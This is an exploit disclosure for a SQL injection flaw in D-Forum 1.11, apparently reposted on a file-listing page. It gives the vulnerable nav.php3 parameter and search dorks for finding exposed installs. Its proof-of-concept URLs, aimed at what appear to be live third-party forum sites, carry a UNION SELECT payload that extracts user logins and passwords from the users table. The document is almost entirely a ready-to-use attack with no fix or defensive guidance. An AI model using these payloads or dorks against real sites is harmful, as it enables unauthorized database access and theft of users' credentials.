D-Forum 1.11 SQL Injection Vulnerability Inveet.id rwxr-xr-x 0 22.47

Filename	D-Forum 1.11 SQL Injection Vulnerability
Permission	rw-r--r--
Author	Inveet.id
Date and Time	22.47
Label
Action

 [-] D-Forum 1.11 SQL Injection Vulnerability

Software : D-Forum version 1.11 [previous version affected too]
Vendor : http://www.adalis.fr/dforum
Author : NoGe

[-] Exploit

http://localhost/[path]/nav.php3?page=voirsujet&boardid=1&postid=[SQLi]

[-] Dork

"Powered by D-forum"
"nav.php3?page=voirsujet"

[-] PoC

http://www.enesm.com/forum/nav.php3?page=voirsujet&boardid=x&postid=-null+union+select+1,2,3,group_concat(0x3a,user_login,0x3a,user_pass,0x3a),5,6,7,8,9,10,11,12,13+from+dforum_users--

http://bmxverrieres.free.fr/dforum/nav.php3?page=voirsujet&boardid=x&postid=-null+union+select+1,2,3,group_concat(0x3a,user_login,0x3a,user_pass,0x3a),5,6,7,8,9,10,11,12,13+from+dforum_users--